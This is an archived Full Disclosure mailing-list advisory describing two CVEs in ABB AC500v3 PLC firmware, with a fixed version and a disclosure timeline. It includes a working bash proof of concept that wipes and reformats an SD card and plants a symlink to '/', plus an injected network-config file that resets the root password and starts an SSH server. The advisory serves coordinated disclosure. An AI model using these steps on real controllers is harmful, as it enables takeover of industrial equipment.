| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <AM9P190MB128109897606E43169E88E7BFE132@AM9P190MB1281.EURP190.PROD.OUTLOOK.COM>
Date: Thu, 9 Jan 2025 20:05:44 +0000
From: Thomas Weber | CyberDanube via Fulldisclosure
<fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] CyberDanube Security Research 20250107-0 | Multiple
Vulnerabilities in ABB AC500v3
CyberDanube Security Research 20250107-0
-------------------------------------------------------------------------------
title| Multiple Vulnerabilities in ABB AC500v3
product| ABB AC500v3
vulnerable version| <=3.7.0.569
fixed version| 3.8.0
CVE number| CVE-2024-12429, CVE-2024-12430
impact| High
homepage| https://global.abb
found| 2024-09-03
by| D. Blagojevic, S. Dietz, T. Weber
| CyberDanube Security Research
| Austria - Vienna
| https://www.cyberdanube.com
|
| This work received funding from the Austrian Research
| Promotion Agency (FFG) in course of the KIRAS project
| TestCat (FO999911248) and was supported by AIT Austrian
| Institute of Technology.
-------------------------------------------------------------------------------
Vendor description
-------------------------------------------------------------------------------
"ABB is a technology leader in electrification and automation, enabling a more
sustainable and resource-efficient future. The company’s solutions connect
engineering know-how and software to optimize how things are manufactured,
moved, powered and operated. Building on more than 140 years of excellence,
ABB’s 105,000 employees are committed to driving innovations that accelerate
industrial transformation."
Source: https://global.abb/group/en/about/
Vulnerable versions
-------------------------------------------------------------------------------
AC500v3 / <= 3.7.0.569
Vulnerability overview
-------------------------------------------------------------------------------
1) Directory Traversal via Symlink (CVE-2024-12429)
A directory traversal vulnerability was identified in the file-explorer
functionality of the device. An attacker can use this vulnerability to read
system-wide files and configuration as user "system".
2) Privilege Escalation (CVE-2024-12430)
A file which gets executed as "root" is owned by "system". An attacker
can abuse this by injecting arbitrary commands.
Proof of Concept
-------------------------------------------------------------------------------
1) Directory Traversal via Symlink (CVE-2024-12429)
When formatting a sd card to ext4 and creating a symlink to "/", an attacker
can access system critical files via the automation builder file-explorer.
-------------------------------------------------------------------------------
#!/bin/bash
# CyberDanube 2024 <S. Dietz>
# abb ac500 symlink exploit
if [ -z "$1" ]; then
echo "usage: ./abb_ac500_symlink.sh /dev/sdX"
exit 1
fi
if [ "$(id -u)" -ne "0" ]; then
echo "This script must be run as root or with sudo."
exit 1
fi
DISK="$1"
PART="${DISK}1"
MOUNT_POINT="/mnt/sdcard"
SYMLINK_TARGET="/"
SYMLINK_NAME="pwned"
umount ${DISK}* 2>/dev/null
# Delete all existing partitions on the disk
(
echo o
echo w
) | fdisk "$DISK"
# Create a new partition on /dev/sda
(
echo n
echo p
echo 1
echo
echo
echo w
) | fdisk "$DISK"
partprobe "$DISK"
mkfs.ext4 -F "${PART}"
mkdir -p ${MOUNT_POINT}
mount ${PART} ${MOUNT_POINT}
ln -s ${SYMLINK_TARGET} ${MOUNT_POINT}/${SYMLINK_NAME}
ls -l ${MOUNT_POINT}
umount ${MOUNT_POINT}
echo "Done."
-------------------------------------------------------------------------------
2) Privilege Escalation (CVE-2024-12430)
The file /mnt/sysdata/netconfig/ifs/ETH1 is writable by the user "system". This
file configures the network interface during boot as user "root". An attacker
can modify this file by using 1) and inject arbitrary commands. Our poc changes
the root password and starts dropbear.
-------------------------------------------------------------------------------
auto ETH1
iface ETH1 inet static
address 192.168.19.123
netmask 255.255.255.0
post-up ip route add 192.168.19.0/24 dev ETH1 table ETH1
post-up ip rule add from 192.168.19.123/32 table ETH1 priority 100
post-up ip rule add from 0.0.0.0/32 to 192.168.19.0/24 dev ETH1 table ETH1
post-up ip route add default via 192.168.19.254 table ETH1
post-up ip route add default via 192.168.19.254 dev ETH1 metric 0
post-up echo 'root:password' | chpasswd
post-up /etc/init.d/dropbear start
-------------------------------------------------------------------------------
Solution
-------------------------------------------------------------------------------
Update to the latest firmware
Workaround
-------------------------------------------------------------------------------
None
Recommendation
-------------------------------------------------------------------------------
Update to the latest firmware. See recommendations in the ABB Cyber Security
Advisory for further information:
https://search.abb.com/library/Download.aspx?DocumentID=3ADR011377&LanguageCode=en&DocumentPartId=&Action=Launch
Contact Timeline
-------------------------------------------------------------------------------
2024-09-04: Contacting ABB via cybersecurity@...abb.com
2024-09-16: Asking if there are any updates regarding the issue.
2024-09-19: Email encryption issue arises. Sending PGP public key again.
2024-09-20: Discussing acknowledgment text and data privacy consent request.
2024-11-04: Asking if there are any updates regarding the issue.
2024-11-07: ABB is requesting a one-month extension of the disclosure deadline.
2024-12-14: ABB requests another extension due to holidays.
2025-01-07: Coordinated release of advisory.
Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com
EOF D. Blagojevic, S. Dietz, T. Weber / @2025
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists